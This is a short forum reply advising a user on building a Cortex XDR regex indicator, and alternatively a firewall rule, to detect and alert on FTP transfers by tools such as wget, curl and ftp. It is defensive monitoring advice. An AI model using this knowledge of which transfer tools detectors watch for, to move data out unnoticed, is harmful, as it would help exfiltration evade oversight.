01-14-2025 02:49 PM
You might have better luck posting this in the Cortex XDR specific discussion forum. There's a couple folks who at least monitor that on a somewhat regular basis that pick up your discussion and be able to help a bit more. You would need to really test your regex to ensure that this doesn't capture too much; it's a bit of a risky exercise honestly.
You'll need to attempt to account for various FTP methods if I understand your end goal appropriately. As an example, you can utilize wget ftp://myftpsite.com, you can utilize FTP directly, CURL, and about a million other utilities. Your most common "catch" would just be building an indicator for ftp://anything and attempt to build something for ftp itself that isn't going to be overly broad and capture more than you want.
I'd also just toss out that building a firewall rule to limit FTP and alert on any denied FTP sessions would likely actually be an easier path forward and still allow you to alert on unexpected/denied FTP traffic.
